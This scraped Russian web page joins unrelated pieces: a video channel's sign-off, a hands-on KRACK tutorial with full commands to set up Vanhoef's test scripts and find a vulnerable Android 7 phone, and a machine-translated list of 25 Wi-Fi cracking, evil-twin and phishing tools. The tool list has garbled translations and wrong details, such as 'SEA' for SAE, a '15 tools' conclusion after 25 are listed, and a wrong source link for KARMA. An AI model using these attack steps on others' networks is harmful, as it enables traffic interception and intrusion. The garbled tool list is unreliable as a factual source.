>>>КЛИКНИТЕ, ЧТОБЫ УЗНАТЬ ПОДРОБНОСТИ<<<

На этом сегодня всё. Если впервые забрёл на канал, то после просмотра не забудь нажать колокольчик. Кликнешь и в твоей ленте будут регулярно появляться годнейшие ролики на тему взлома, пентестинга и сисадминства.

С олдов, как обычно, по лайку. Удачи, успехов, ребятки. Защищайте себя и свои сети. Не пренебрегайте паролями и главное, не переставайте учиться новому, никогда. С вами был Денис Курец. Благодарю за просмотр. Всем пока.

class=»eliadunit»>
Полезные материалы:

KRACK на практике. Как работает атака на Wi-Fi с применением нашумевшей техники

Содержание статьи

Осенью 2017 года мир узнал о новой угрозе безопасности сетей Wi-Fi. Она затрагивает абсолютно все устройства и программные платформы. Каким бы сложным и длинным ни был пароль, это не поможет, потому что KRACK — уязвимость самого протокола обмена ключами шифрования WPA2. В этой статье мы разберемся в теории бага и попробуем испытать его на практике.

 

История уязвимости

16 октября 2017 года была раскрыта информация о критических проблемах WPA2, которые позволяют обойти защиту и в результате прослушивать трафик Wi-Fi, передаваемый между точкой доступа и компьютером.

Комплекс уязвимостей в WPA2, получивший название KRACK (аббревиатура от Key Reinstallation Attacks), был обнаружен сводной группой исследователей из разных университетов и компаний.

Руководитель группы Мэти Ванхоф рассказал, что ему удалось найти проблемы, из которых формируется KRACK, еще в 2016 году, но он более года совершенствовал свою атаку. Исследователь сообщил об уязвимостях некоторым производителям и представителям организации US-CERT в июле 2017 года, а в августе поделился информацией о проблемах с широким кругом вендоров.

Производители оборудования поспешили выпустить патчи прошивки, которые устраняют уязвимости, но, как всегда бывает в таких случаях, остается огромное число необновленных устройств.

 

Принцип действия

В основе атаки лежит уязвимость четырехэлементного хендшейка WPA2. Этот хендшейк выполняется тогда, когда клиент хочет подключиться к защищенной сети Wi-Fi. В процессе подтверждается, что обе стороны (клиент и точка доступа) обладают корректными учетными данными. В то же время хендшейк используется для согласования свежего ключа шифрования, который впоследствии будет применяться для защиты трафика.

Злоумышленник может устроить атаку типа man in the middle и принудить участников сети реинсталлировать ключи шифрования, которые защищают трафик WPA2. К тому же, если сеть настроена на использование WPA-TKIP или GCMP, злоумышленник сможет не только прослушивать трафик WPA2, но и инжектить пакеты в данные жертвы.

Эксплуатируя эту критическую ошибку, можно добиться расшифровки трафика, сделать HTTP-инжекты, перехватить TCP-соединения и многое другое.

От KRACK может защитить использование HTTPS, однако далеко не всегда. Дело в том, что сам HTTPS нельзя назвать абсолютно безопасным (к примеру, существуют методики даунгрейда соединения), хотя он и станет дополнительным слоем шифрования.

Метод универсален и работает против любых незапатченных устройств, подключенных к Wi-Fi. Главное условие заключается в том, что атакующему придется находиться в зоне действия атакуемой сети Wi-Fi, то есть атаку нельзя провести удаленно.

Мэти Ванхоф демонстрирует уязвимость

 

Уязвимости, вошедшие в состав KRACK

  • CVE-2017-13077: reinstallation of the pairwise encryption key (PTK-TK) in the 4-way handshake.
  • CVE-2017-13078: reinstallation of the group key (GTK) in the 4-way handshake.
  • CVE-2017-13079: reinstallation of the integrity group key (IGTK) in the 4-way handshake.
  • CVE-2017-13080: reinstallation of the group key (GTK) in the group key handshake.
  • CVE-2017-13081: reinstallation of the integrity group key (IGTK) in the group key handshake.
  • CVE-2017-13082: accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it.
  • CVE-2017-13084: reinstallation of the STK key in the PeerKey handshake.
  • CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake.
  • CVE-2017-13087: reinstallation of the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.
  • CVE-2017-13088: reinstallation of the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.

 

Эксплуатация

Для демонстрации уязвимости нам понадобится оборудование — как минимум один, а лучше несколько USB Wi-Fi-адаптеров, совместимых с Kali Linux. Мой выбор пал на TP-Link N150 Wireless High Gain USB Adapter (TL-WN722N), он уже протестирован и хорошо совместим с моим дистрибутивом. Но ты можешь использовать и любой другой на свой вкус.

Зачем нам вообще этот «свисток», если у ноутбука есть адаптер Wi-Fi? Отдельное устройство для вардрайвинга рекомендуется не только потому, что на него меньше наводок и у него более сильная антенна, но еще и из соображений удобства. Со встроенного адаптера Wi-Fi можно параллельно выходить в интернет, а это довольно важная возможность.

В общем, с TP-Link мы и поднимем свою фейковую (или, если угодно, тестовую) сеть и будем проворачивать в ней наш эксперимент.

 

Поднимем Wi-Fi на Kali Linux

Итак, загружаем Kali и идем в таскбар (правый верхний угол рабочего стола), поднимаем Wi-Fi-адаптер (то есть включаем его) и коннектимся к заранее заготовленной сети.

Ключ шифрования у нас WPA2-Personal, и сразу договоримся использовать длинный и надежный пароль. Сеть, к которой мы будем подключаться, у меня называется SKG2.

Коннектимся к сети с именем SKG2
Свойства беспроводной сети SKG2

 

Инсталлируем инструментарий Krack Attack

Сначала нам нужно убедиться, что все необходимые зависимости для инструментария Krack Attack у нас в системе есть. Выполним такую команду:

$ sudo apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
Инсталляция пакетов для Krack Attack

Поскольку в самом Kali Linux по умолчанию нет инструментов для воспроизведения нужной нам атаки, мы идем на GitHub и скачиваем там набор скриптов.

$ git clone https://github.com/vanhoefm/krackattacks-scripts.git
Инсталляция инструментария Krack Attack

Дальше нам для чистоты эксперимента нужно отключить аппаратное шифрование (hardware encryption). То есть шифровать ключи будем только программными средствами, вшитыми в протоколы Wi-Fi. Для этого переходим в директорию с Krack Attack:

$ cd krackattacks-script

И там запускаем конфигурационный скрипт:

$ sudo ./krackattack/disable-hwcrypto.sh.root
Запускаем конфигурационный скрипт, чтобы отключить аппаратное шифрование

Дальше нам нужно отключить Wi-Fi в сетевом менеджере Kali, то есть отключиться от сети SKG2. Это позволит начать собственную трансляцию в новой сетке WLAN0, где мы и проведем атаку.


Следующим шагом создаем тестовую сеть Wi-Fi с помощью TP-Link N150. Однако для начала нам нужно убедиться, что наше железо не заблокировано. А выясним мы это с помощью утилиты rfkill, набрав следующую команду:

$ sudo rfkill unblock wifi

После того как создана тестовая сеть, мы используем сценарий krack-test-client.py. Этот скрипт на Python будет проверять все устройства, подключающиеся к нашей сети Wi-Fi, на уязвимость «атаки переустановки ключей» (именно так официально называется этот метод).

Итак, создаем сетку. Скомпилируем наш модифицированный экземпляр hostapd. Если ты не в курсе, hostapd — это демон (служба) беспроводной точки доступа в Linux.

$ cd ../hostapd
$ cp defconfig .config
$ make -j 2

Отключим аппаратное шифрование для нашей фейковой сети следующей командой (запускаем все тот же конфигурационный скрипт):

$ cd ../krackattack/
$ sudo ./disable-hwcrypto.sh

Вообще-то после того, как скрипт отработает, нужно перезагрузиться (так советуют разработчики инструмента). Но у меня все работало и без ребута. Но если что-то пойдет не так, перезагружай тачку.

После перезагрузки (или без) выполняем команду

$ sudo ./krack-test-client.py

Это тот самый скрипт на Python, который позволит переустановить ключи в четырехстороннем рукопожатии и автоматически создаст сеть. Используется метод шифрования WPA2-Personal, а SSID будет testnetwork.

Результат работы скрипта — тестовая сеть создана!

 

Атака

Теперь берем ноут с Windows 10 и цепляемся на нем к сети testnetwork. Вводим наш очень сложный и длинный пароль и удостоверяемся, что коннект произошел.


После того как ноут с Windows 10 оказался в тестовой сети, в терминале Kali мы получаем оповещения от скрипта krack-test-client.py, который пытается просканировать подключенный клиент (наш ноутбук) на уязвимость и, если найдет ее, проэксплуатировать.

Но результат пока грустный. У Windows 10, конечно же, есть патч, о чем гласит строчка Client DOESN’T seem vulnerable to pairwise key reinstallation in the 4-way handshake.

Скрипт сообщает, что наш клиент неуязвим перед KRACK

Попробуем еще несколько вариантов, задаваемых ключами к скрипту.

$ sudo ./krack-test-client.py --group
$ sudo ./krack-test-client.py --tptk
$ sudo ./krack-test-client.py --tptk-rand

Но конечно же, ничего не срабатывает. Неужели мы зря столько старались?

Не зря! Я без труда нашел у себя уязвимое устройство — им оказался телефон с Android 7.0, который последний раз обновлялся в июле 2018 года. Такие наверняка еще можно встретить.

Информация о пакетах обновления для смартфона на Android 7

Коннектим смартфон к testnetwork и смотрим, что нам скажет наш скрипт. Несколько секунд ожидания, и он сообщает, что Android уязвим для групповой переустановки ключей в четырехстороннем рукопожатии.

Android 7 оказался уязвим

Мы достигли результата! Дальше можно открывать, к примеру, Wireshark и снифить пакеты. В целом эксперимент показал, что KRACK — это пока что вполне реальная проблема и атака работает.

 

Как защититься?

Получается, что почти каждое устройство почти в любой сети Wi-Fi можно взломать при помощи KRACK. Звучит страшновато, но — как и в случае с любой другой атакой — это еще не конец света. Вот пара советов, как защититься от KRACK:

  • во-первых, всегда проверяй, чтобы в адресной строке браузера была зеленая иконка замка. Если используется HTTPS, значит, KRACK не позволит расшифровать трафик;
  • во-вторых, обязательно ставь последние обновления безопасности.

И конечно, для критичных сессий ты можешь не доверять беспроводному соединению вообще. Или используй VPN: с ним у тебя будет сквозное шифрование между клиентом и сервером.

 

Поможет ли WPA3 от KRACK?

27 июня 2018 года альянс Wi-Fi объявил об окончании разработки нового стандарта безопасности — WPA3. Это одновременно и новый протокол безопасности, и название соответствующей программы сертификации.

Создатели WPA3 попытались устранить концептуальные недоработки, которые всплыли с появлением KRACK. Поскольку ключевая уязвимость скрывалась в четырехстороннем рукопожатии, в WPA3 добавилась обязательная поддержка более надежного метода соединения — SEA, также известного как Dragonfly.

Технология SEA (Simultaneous Authentication of Equals) уже применялась в mesh-сетях и описана в стандарте IEEE 802.11s. Она основана на протоколе обмена ключами Диффи — Хеллмана с использованием конечных циклических групп.

SEA относится к протоколам типа PAKE и предоставляет интерактивный метод, в соответствии с которым две и более стороны устанавливают криптографические ключи, основанные на знании пароля одной или несколькими сторонами. Результирующий ключ сессии, который получает каждая из сторон для аутентификации соединения, выбирается на основе информации из пароля, ключей и MAC-адресов обеих сторон. Если ключ одной из сторон окажется скомпрометирован, это не повлечет компрометации ключа сессии. И даже узнав пароль, атакующий не сможет расшифровать пакеты.

Еще одним новшеством WPA3 будет поддержка PMF (Protected Management Frames) для контроля целостности трафика. Но в будущем поддержка PMF станет обязательной и для WPA2.

Однако то, что WPA3 обратно совместим с WPA2, уже вызвало критику Мэти Ванхофа, автора атаки KRACK. Он уверен, что найдется способ обхода PMF для принудительного отсоединения клиента от сети.

Внедрение SEA хоть и усложнит проведение словарных атак, но не исключит их и лишь сделает более длительными, а для обхода защиты в открытых сетях атакующий по-прежнему сможет развернуть свою точку доступа и перехватывать трафик.

К тому же WPA3 должен быть реализован в устройстве аппаратно, и простым обновлением его поддержку добавить нельзя. Соответственно, на внедрение уйдут долгие годы, а исследователи ИБ не сидят сложа руки.

Лучшие инструменты для взлома беспроводных сетей

Было время, когда люди полагались на широкополосные и мобильные пакеты данных для подключения к Интернету. С притоком Интернета вещей в нашу повседневную жизнь использование Wi-Fi увеличилось во много раз. В каждом доме есть от пяти до шести устройств, которым для эффективной работы требуется Интернет. В настоящее время дома стали более связанными с цифровыми технологиями благодаря интенсивному использованию смарт-телевизоров, смарт-систем переменного тока, смартфонов, ноутбуков, умных будильников и т. Д. Три компонента, связанные с Wi-Fi, также вышли на новый уровень вместе со всеми другими достижениями:

  • Протоколы WiFi: Нам хорошо известно, что использование WEP обесценилось из-за недостатков безопасности.Стек протоколов со временем превратился из крайне небезопасного в максимально возможный уровень безопасности.

  • Аппаратная технология: Обе конечные точки, использующие Wi-Fi, и маршрутизатор Wi-Fi стали продвинутыми. Раньше маршрутизаторы поставлялись с одной антенной, обеспечивающей небольшой диапазон сигнала. Теперь маршрутизаторы имеют больший радиус действия, лучшую мощность сигнала и несколько антенн, направленных в разных направлениях, чтобы убрать слепые зоны.

  • Wireles Атаки: Общедоступный Wi-Fi, бесплатный Wi-Fi и личные точки доступа на ходу увеличили количество беспроводных площадок, на которые могут нападать злоумышленники.Злоумышленники могут взломать сеть и отслеживать трафик в этой сети или взломать пароль и бесплатно использовать вашу сеть. Просто проверьте беспроводные сети, которые ловит ноутбук, и вы сразу увидите пример!

Прежде чем мы начнем углубляться в взлом беспроводных сетей, давайте разберемся с некоторыми вещами.

Взлом / атака неавторизованных беспроводных сетей является незаконным. Статья не поощряет использование вышеупомянутых инструментов в преступных целях.Эти инструменты должны использоваться только в образовательных целях и для тестирования на ваших собственных устройствах или в сети. Дела не будут простыми; взломать беспроводную сеть не так просто, как показано в фильмах о взломах. Чтобы обезопасить себя от хакерских атак, всем советуем использовать расширение VPN Google или VPN для версии Desktop. VPN скрывает ваш IP-адрес и геолокацию. Инструмент VPN делает невозможным взлом вашего устройства и кражу ваших личных данных.

Что такое взлом беспроводной сети?

Из-за все более широкого использования беспроводных сетей количество атак на беспроводные сети растет экспоненциально.Сети Wi-Fi обычно уязвимы для взлома, поскольку беспроводные сигналы могут быть перехвачены и использованы где угодно и кем угодно.

Взлом беспроводной сети можно определить как атаку на беспроводные сети или точки доступа, которые предлагают конфиденциальную информацию, такую ​​как атаки аутентификации, пароли Wi-Fi, доступ к порталу администратора и другие подобные данные. Взлом беспроводной сети выполняется для получения несанкционированного доступа к частной сети Wi-Fi.

Рост использования Wi-Fi привел к увеличению числа атак на беспроводные сети.Любая атака на беспроводные сети или точки доступа, которые предоставляют существенную информацию, называется взломом беспроводной сети. Эта информация может быть в форме паролей Wi-Fi, доступа к порталу администратора, атак аутентификации и т. Д. Для понимания взлома беспроводных сетей одна из самых важных вещей, которые необходимо понять, — это протоколы, используемые в беспроводных сетях. Атаки в основном совершаются на внутренних этапах стека протоколов. IEEE 802.11 определяет стандарты для беспроводных сетей; Давайте обсудим некоторые алгоритмы, которые используются в сетях Wi-Fi:

  • WEP (Wired Equivalent Privacy): WEP использует 40-битный ключ и 24-битный вектор инициализации.Он использует RC4 для конфиденциальности и CRC 32 для целостности. Поскольку вектор инициализации состоит из 24 бита, существует высокая вероятность того, что один и тот же ключ будет повторяться после каждых 5000 пакетов. WEP — это устаревший алгоритм из-за выявленных различных уязвимостей и того факта, что его очень легко взломать.

  • WPA и WPA2: WPA был представлен как временное решение для устройств, не поддерживающих WPA2. WPA теперь не работает и обесценивается. WPA2 считается самым безопасным на сегодняшний день.Инструменты, обсуждаемые далее в статье, также будут содержать подробности о том, как атаковать WPA и WPA2, но успех атаки зависит от времени и вычислительной мощности.

Вам также может понравиться: OWASP — 10 самых уязвимых мест в веб-приложениях (обновлено для 2018)

Атакующие методы

  • Метод взлома WEP: WEP использует 40-битный ключ длиной 8 символов. После захвата достаточного количества пакетов данных взлом этого ключа не займет более нескольких минут.

  • Метод взлома WPA / WPA2: На наших устройствах хранятся пароли к беспроводной сети, поэтому мы не вводим пароль на одном и том же устройстве снова и снова. Злоумышленники пользуются этим, принудительно деаутентифицируя все устройства в сети. Устройства попытаются автоматически подключиться к точке доступа, завершив 4-стороннее рукопожатие. Это рукопожатие записывается и имеет хешированный пароль. Хешированный пароль можно подобрать перебором с помощью радужной таблицы.

  • Взлом WPS: Эта технология использует 8-значный контакт для подключения к беспроводному маршрутизатору. Грубая форсировка 8-значного пина даст доступ к маршрутизатору. Различные инструменты используют различные методы оптимизации, чтобы увеличить скорость этой атаки и взломать ключ за пару часов.

Вам также может понравиться: Атаки грубой силой: основные инструменты для борьбы с такими атаками

Что такое инструменты для взлома беспроводных сетей?

Wireless hacking tools — это программное обеспечение, специально разработанное для взлома беспроводных сетей путем использования словарных атак для взлома беспроводных сетей, защищенных WEP / WPA, или использования уязвимостей в системах Wi-Fi.

Взлом или получение несанкционированного доступа к беспроводным сетям является незаконным действием и не поощряется. Эти инструменты беспроводного взлома используют различные методы для взлома сетей Wi-Fi, такие как сайдджек, атаки методом перебора, атаки по словарю, злой двойник, шифрование и атаки типа «человек посередине».

Мы составили список лучших инструментов для взлома или восстановления паролей Wi-Fi, которые можно использовать в образовательных целях и для взлома ваших собственных систем или сетей Wi-Fi. Если вы хотите стать профессионалом в области кибербезопасности, вам придется разбираться в способах взлома Wi-Fi и узнать о беспроводных технологиях.

Вот 25 лучших хакерских инструментов и программного обеспечения, обновленных к 2021 году. Они используются для взлома паролей беспроводных сетей, устранения неполадок сети и анализа беспроводных систем на предмет потенциальных проблем безопасности.

Инструменты для взлома беспроводных сетей, используемые для взлома пароля беспроводной сети и устранения неполадок в сети

1. Aircrack-ng

Aircrack-ng — один из самых популярных наборов инструментов, которые можно использовать для мониторинга, атаки, тестирования и взлома сетей Wi-Fi. Он совместим с Windows, Linux, OS X и является инструментом командной строки.Его можно использовать для атаки и взлома WPA и WEP. Механизм крепления простой. Он отслеживает и собирает пакеты после захвата достаточного количества пакетов; он пытается восстановить пароль.

Несколько вещей, над которыми стоит подумать перед тем, как начать. Вам нужна беспроводная карта, которая может вводить пакеты в сеть, иначе вы не сможете взломать.

2. AirSnort

AirSnort — это бесплатное программное обеспечение для взлома Wi-Fi, которое перехватывает пакеты и пытается расшифровать ключи.Мониторинг выполняется в беспорядочном режиме и записывает достаточно пакетов, чтобы надежно расшифровать ключ. Это простой инструмент, поддерживающий платформы Windows и Linux. Дальнейшая разработка и обслуживание этого инструмента были прекращены, но старую версию все еще можно загрузить.

Вам также может понравиться: SPECTER and MELTDOWN: Как узнать, находится ли мой компьютер в опасности?

3. Кисмет

Kismet — это бесплатное программное обеспечение, написанное на C ++, которое можно использовать для прослушивания пакетов TCP, UDP, DHCP и ARP.Это пассивный инструмент, который не взаимодействует с сетью. Обладает способностью находить скрытые сети и используется в вардрайвинге. Захваченные пакеты можно экспортировать в WireShark и проанализировать в дальнейшем. Он доступен для Linux, Windows и некоторых других платформ.

4. Каин и Авель

Cain & Abel — один из самых популярных инструментов, используемых для взлома паролей. Инструмент способен обнюхивать сеть, взламывать зашифрованные пароли, используя различные методы взлома паролей, и выполнять атаки криптоанализа.Он также может обнаруживать беспроводные ключи, анализируя беспроводные протоколы.

5. CoWPAtty

Само имя CoWPAtty имеет WPA в верхнем регистре и остальные строчные буквы. Это инструмент на базе Linux, который может выполнять атаки по предварительно разделенным ключам для сетей WPA. Инструмент имеет интерфейс командной строки и может выполнять атаки по словарю в беспроводных сетях с помощью файла списка слов. Выполнение происходит медленно из-за использования SHA 1 с начальным значением SSID, но вы все равно можете попробовать.

6. OmniPeek

OmniPeek — это сниффер пакетов и анализатор протоколов. Разработанный организацией Savvis, он доступен только для платформы Windows. Этот инструмент может многое предложить, если вы разбираетесь в протоколах. Перехваченные пакеты могут быть сохранены в базе данных SQL, которая при необходимости может быть проанализирована и декодирована. Возможности можно расширить с помощью подключаемых модулей API. Для этого инструмента доступно около 40+ API. Вы также можете расширить возможности инструмента, посетив портал сообщества MyPeek, если хотите.Средство имеется в продаже.

Вам также может понравиться: Удивительные инструменты и методы мобильного взлома

7. Эйрджек

Как следует из названия, инструмент может захватывать воздух, то есть беспроводной. Инструмент может принимать и вводить необработанные пакеты в беспроводную сеть. Его могут использовать разработчики для настройки пакетов и внедрения их для разработки решения или хакеры беспроводной сети. Хакер беспроводной сети может выполнять атаки типа «отказ в обслуживании», наводняя сеть грязными внедренными пакетами.

8. InSSIDer

SSID, указанный заглавными буквами в самом названии, говорит о возможностях этого инструмента. Это беспроводной сканер, который поддерживает как Windows, так и OS X. Инструмент был доступен как программное обеспечение с открытым исходным кодом, но больше не доступен. Инструмент может получать информацию с беспроводных карт и помогает выбрать лучший доступный канал с максимальной мощностью. Уровень сигнала отображается в графическом формате по времени. Доступны различные версии инструмента, и вы можете выбрать их в соответствии с вашими требованиями (хотя вам нужно будет охотиться за ним).

9. WepAttack

WepAttack может использоваться для взлома ключей 802.11 WEP с использованием подхода на основе словаря. Инструмент может захватывать файл сетевого дампа, полученный от pcap или libpcap и т. Д. Инструмент имеет открытый исходный код и поддерживает платформу Linux. Здесь следует отметить, что атака носит активный, а не пассивный характер. Инструмент просто проверит словарные слова, чтобы получить рабочий ключ. Ключевым требованием для этого является наличие исправной сетевой карты.

10. Разбойник

Reaver использует методы грубой силы для защиты ПИН-кодов регистратора настройки WiFi для получения парольных фраз WPA / WPA2.Одно из преимуществ этого инструмента — время отклика. Вы можете получить кодовую фразу в виде открытого текста всего за пару часов. Если вы используете kali, пакет reaver уже включен в комплект.

11. Папоротник Wifi Cracker

Fern WiFi Cracker — это инструмент на основе Python, который можно использовать для взлома WEP / WPA / WPA2, перехвата сеанса, повторов запросов ARP и выполнения атак методом грубой силы. Он способен сохранить ключ в базе данных при успешной атаке. Он поддерживает функцию автоматической атаки на точку доступа, а также имеет внутренний механизм MITM.Это тоже предварительно включено в kali.

12. NetStumbler

Если вам интересно узнать об открытых сетях Wi-Fi, этот инструмент для Windows может помочь вам в этом. Вы можете обнаружить несанкционированные точки доступа, неправильную конфигурацию сети, участки с плохой связью и т. Д. Во время вардрайтинга и военного обхода. Инструмент является старым ветераном и не обновляется в течение длительного времени, поэтому вы можете столкнуться с некоторыми проблемами совместимости. Этот инструмент активно взаимодействует с идентифицированными сетями, чтобы собрать как можно больше информации и, следовательно, может быть легко обнаружен.

Вам также может понравиться: 20 лучших инструментов компьютерной криминалистики 2018 года

13. Wireshark

Wireshark — один из наиболее распространенных сетевых анализаторов, доступных на рынке. Он использует пакеты, захваченные WinPcap и libpcap, и позволяет вам проверять трафик, проходящий через вашу сеть. Он доступен для Linux, Mac и Windows и представляет собой инструмент на основе графического интерфейса. Инструмент фиксирует и представляет подробные сведения о захваченных пакетах на микроуровне.Если вы знаете, что ищете, этот инструмент может оказаться вам очень полезным. Поскольку количество захваченных пакетов может быть огромным, инструмент имеет возможность фильтрации пакетов на основе типа протокола, строк и т. Д.

14. Облачный взломщик

Cloudcracker — облачное решение для взлома паролей различных утилит. Инструмент использует атаки по словарю для взлома паролей. Размер словаря составляет до 10 цифр. Просто загрузите файл рукопожатия вместе с некоторыми другими деталями, и все готово.

15. CommView для Wi-Fi

CommView for WiFi — это программа-анализатор пакетов. Он основан на графическом интерфейсе пользователя и может контролировать беспроводные сети 802.11 a / b / g / n. Пакеты захватываются, и может быть идентифицирована такая информация, как мощность, точки доступа, сетевые соединения. Если вы просто хотите анализировать трафик на вашем компьютере, вы можете предпочесть версию CommView без беспроводной связи.

16.

Wifiphisher

Wifiphisher — это бесплатный инструмент для взлома Wi-Fi, который выполняет автоматические фишинговые атаки на беспроводные сети, чтобы узнать имя пользователя и пароль или заразить жертву «вредоносным ПО».Он предустановлен для Kali Linux и может без проблем использоваться в операционных системах Windows, MAC и LINUX.


Источник: github.com

Единственный фактор, который отличает Wifiphisher от других инструментов для взлома WiFi, заключается в том, что при попытке взлома беспроводных сетей он запускает атаку социальной инженерии. Это совершенно другой вектор, не нуждающийся в грубом форсировании. Вифифишер нападает на своих жертв в три решающих фазы:

Деаутентификация жертв с их точек доступа

Заставить жертв присоединиться к мошеннической точке доступа путем обнюхивания области и копирования целевых точек доступа

Обслуживайте жертв с реалистичной специально настроенной фишинг-страницей

17.

KisMac

KisMac — это инструмент для взлома беспроводных сетей, специально предназначенный для Mac OS X. Этот классический инструмент для взлома 802.11 WEP / WPA не для новичков, он довольно популярен среди продвинутых профессионалов. Он пытается взломать ключи WEP и WPA, пассивно сканируя сети на поддерживаемых картах Wi-Fi на наличие каких-либо недостатков, используя какие-либо недостатки или используя грубую силу.


Источник: kismac-ng.org

KisMAC имеет множество функций, которые делают его похожим на другой инструмент взлома Kismet.Этот инструмент может помочь вам собрать важную информацию об окружающих беспроводных сетях. У него есть приложение сканера безопасности, которое позволяет рисовать карты Wi-Fi, показывает зарегистрированных клиентов и обнаруживает SSID.

18.

Wifite

Wifite предлагает полезные функции взлома паролей и совместим с операционными системами на базе Linux. Он способен атаковать несколько сетей с шифрованием WEP, WPA и WPS подряд. Wifite — фаворит среди пентестеров.Это идеальный выбор для проверки ваших навыков взлома Wi-Fi и исследования беспроводных сетей клиентов на уязвимость.


Источник: github.com

Основная цель Wifite — быть программным обеспечением для аудита WiFi, которое можно настроить для автоматизации с помощью пары аргументов. Версия этого инструмента для Windows недоступна. Вы можете найти его либо в операционной системе kali Linux, либо в операционной системе с возвратом.

19.

WepDecrypt

WepDecrypt написан на языке C и является одним из наиболее эффективных инструментов беспроводного взлома для подбора ключей WEP путем генерации ключей, распределенной сетевой атаки и атаки по словарю.WebDecrypt — отличный инструмент для новичков, и для его бесперебойной работы требуется несколько каталогов.


Источник: wepdecrypt.sourceforge.net

Ключевой особенностью WebDecrypt в качестве программного обеспечения для взлома в 2021 году является то, что он имеет собственный генератор ключей, реализует фильтры пакетов и отлично работает в ОС Windows.

20.

Пирит

Pyrite — это бесплатный инструмент для взлома беспроводных сетей, размещенный в коде Google, для выполнения атак на аутентификацию IEEE 802.11 WPA / WPA2-PSK.Для взлома паролей WPA / WPA-2 этот инструмент выполняет атаки методом грубой силы. Есть вероятность, что этот инструмент вскоре исчезнет, ​​но в настоящее время он работает в нескольких операционных системах, таких как Linux, MacOS X, FreeBSD.


Источник: code.google.com

Пара способностей Пирита:

  • Проанализируйте захваченные файлы, чтобы определить «взламываемые» рукопожатия
  • Оценка частоты процессора компьютера
  • Используйте возможности GPU для взлома паролей

Две жизненно важные возможности Pyrit — это настоящий перебор и атаки по словарю, в зависимости от пропускной способности конкретной беспроводной системы.

21.

Сетевой картограф (NMAP)

Network Mapper, называемый NMAP, представляет собой инструмент для взлома беспроводных сетей с открытым исходным кодом для обнаружения сетей и сканирования уязвимостей. Этот инструмент широко используется сетевыми администраторами для различных целей, например:

  • Определение того, какие устройства работают в их системах
  • Обнаружение угроз безопасности
  • Определение доступных хостов и услуг, которые они предлагают
  • Обнаружение открытых портов


Источник: nmap.org

NMAP — один из лучших хакерских инструментов, поскольку он довольно универсален, удобен в использовании и содержит множество функций, обеспечивающих беспроблемное сканирование системы безопасности. Первоначально NMAP был совместим только с Linux, но постепенно он начал работать в других операционных системах, таких как Windows, IRIX, Solaris, AmigaOS, варианты BSD (включая OS X), HP-UX и т. Д.

22.

IKECrack

IKECrack — это инструмент для взлома беспроводных сетей с открытым исходным кодом для взлома аутентификации IPsec / IKE.Этот инструмент специально создан для захвата пакетов Internet Key Exchange. Кроме того, это эффективный инструмент для взлома сети VPN. IKECrack взламывает беспроводную сеть, получая и используя комбинации идентификаторов и секретных ключей сети.


Источник: ikecrack.sourceforge.net

IKECrack способен выполнять мощные атаки методом перебора и реализовывать криптографические тесты, поэтому этот инструмент является идеальным выбором для клиентов, у которых есть возможность таких тестов.

23.

КАРМА

KARMA — это программа для взлома с открытым исходным кодом, в которой используются методы зондирования, используемые клиентом WLAN. Станция исследует список предпочтительных сетей Wi-Fi и ищет беспроводную локальную сеть, чтобы сделать SSID открытым для доступа злоумышленников.

Источник: karma-runner.github.io

KARMA использует раскрытый SSID для имитации действующей WLAN и привлекает внимание прослушивающего злоумышленника к станции.Как только жертва попадает в ловушку KARMA, инструмент крадет важные учетные данные, такие как логины и пароли, перенаправляя запросы FTP, Интернета и электронной почты на телефонные сайты.

24.

Йерсиния

Yersinia — это программа для взлома беспроводных сетей с открытым исходным кодом, разработанная для Unix-подобных операционных систем. Этот инструмент способен обнаруживать уязвимости сетевых протоколов уровня 2. Это мощный инструмент для анализа и тестирования развернутых сетей Wi-Fi. Yersinia способна выявлять уязвимости в следующих сетевых протоколах:

  • Протокол связующего дерева (STP)
  • Протокол маршрутизатора горячего резервирования (HSRP)
  • Протокол обнаружения Cisco (CDP)
  • Протокол связи между коммутаторами (ISL)
  • Протокол динамического транкинга (DTP)
  • Протокол динамической конфигурации хоста (DHCP)
  • Протокол транкинга VLAN (VTP)


Источник: sectools.org

Yersinia может выполнять несколько атак по различным протоколам и является эффективным инструментом для тестирования на проникновение. Это широко распространенная и ценная программа для взлома беспроводных сетей.

25.

Эйргеддон

Airgeddon — один из новейших и передовых инструментов для взлома беспроводных сетей. Подобно другим решениям для взлома, он может переключать режим вашего интерфейса с «Монитор» на «Управляемый». Его основная цель — аудит беспроводных сетей с использованием многоцелевых сценариев bash для систем Linux.


Источник: github.com

Одной из ключевых особенностей Airgeddon является то, что он может выполнять атаки методом перебора после дешифрования захваченных офлайн-паролей. Кроме того, он позволяет тестерам на проникновение выполнять DoS-атаку по сети Wi-Fi, используя другой популярный беспроводной инструмент под названием aireplay-ng и различные методы, такие как mdk3, mdk4.

Заключение

На рынке доступно множество инструментов для взлома беспроводных сетей, 15 из которых мы обсудили в этой статье.Следует отметить, что инструменты обсуждаются в случайном порядке, а не в какой-либо форме приоритета или превосходства над другими. Обсуждаемые здесь инструменты предназначены не только для хакеров беспроводной связи, но также используются администраторами WiFi и программистами, работающими над проектами на основе WiFi. Эти инструменты можно использовать либо для мониторинга сети, либо для взлома ключей для получения доступа. Возможно, вам придется использовать несколько инструментов, чтобы получить желаемый результат, поскольку ни один из инструментов не будет соответствовать всем требованиям. Как хакер беспроводной сети или профессионал в области безопасности, вы должны иметь в своем арсенале некоторые из этих инструментов, легко доступных для быстрого анализа.Некоторые инструменты используют грубую силу, чтобы взломать ключи, убедиться, что у вас есть обновленный дамп главного ключа, или составить индивидуальный список на основе вашего опыта. У хакера WiFi всегда будет индивидуальный список, составленный из различных списков. Программа взлома будет настолько хороша, насколько хорош сам список слов.

Также стоит отметить? FTC получила более 1,4 миллиона сообщений о краже личных данных только в 2020 году, многие из которых были вызваны онлайн-мошенничеством и взломами безопасности. Последствия кражи личных данных могут стремительно расти и повлиять на многие важные вещи, начиная с вашего кредитного рейтинга.В этих случаях могут потребоваться специалисты по ремонту кредита, чтобы помочь вам оспорить претензии и вернуть кредит в нужное русло. Если вы хотите узнать больше, ознакомьтесь с руководством Money.com по ремонту кредита или по удалению элементов из вашего кредитного отчета.

